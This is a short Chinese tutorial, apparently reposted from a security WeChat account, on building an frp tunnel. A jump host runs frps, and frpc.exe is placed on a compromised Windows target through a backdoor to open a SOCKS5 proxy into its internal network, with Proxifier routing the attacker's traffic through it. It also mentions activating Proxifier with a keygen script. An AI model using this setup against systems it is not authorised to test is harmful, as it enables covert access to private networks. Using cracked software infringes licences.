frp内网穿透环境搭建

环境介绍

3台设备:本地攻击机、远程跳板机、远程目标服务器

前置操作需要根据目标服务器环境下载对应版本的frp(0.46.0)

下载安装Proxifier并使用工具python Proxifier_Keygen.py -v setup激活

配置跳板机

跳板机为linux,直接下载并上传linux版本0.46.0的frps

配置frps.ini

[common]
bind_port = 50001
privilege_token = pentest999
tls_only = true

启动服务监听nohup ./frps -c frps.ini >/dev/null 2>&1 &后台没回显

如果想要关掉

ps -aux|grep frp| grep -v grep
kill -9 PID

配置目标服务器

将windows版本0.46.0的frpc.exe利用后门上传上去,并编写配置文件frpc.ini如下格式

[common]
server_addr = 跳板机ip
server_port = 50001
protocol = tcp
tls_enable = true
privilege_token = pentest999

[plugin_socks5]
type = tcp
remote_port = 8123
plugin = socks5
use_encryption = true
use_compression = true
plugin_user = ptest666
plugin_passwd = ptest666

运行frp连接跳板机frpc.exe -c frpc.ini

配置Proxifier

设置Proxy Sever新增一项

server地址填跳板机地址,端口为frpc.ini中设置的8123,以及用户名和密码都是frpc.ini中设置的ptest666

frp内网穿透环境搭建

在Proxification Rules中新增一条规则,即将任意app的目的地址为10.0.0.0/8的流量都指向我们刚才设置的跳板机ip:8123

frp内网穿透环境搭建

测试连通性

目标服务器内网存在一个springboot项目,现在就可以直接用本机的浏览器输入内网ip直接访问了

frp内网穿透环境搭建


原文始发于微信公众号(智佳网络安全):frp内网穿透环境搭建

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/300749.html

(0)
小半的头像小半

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!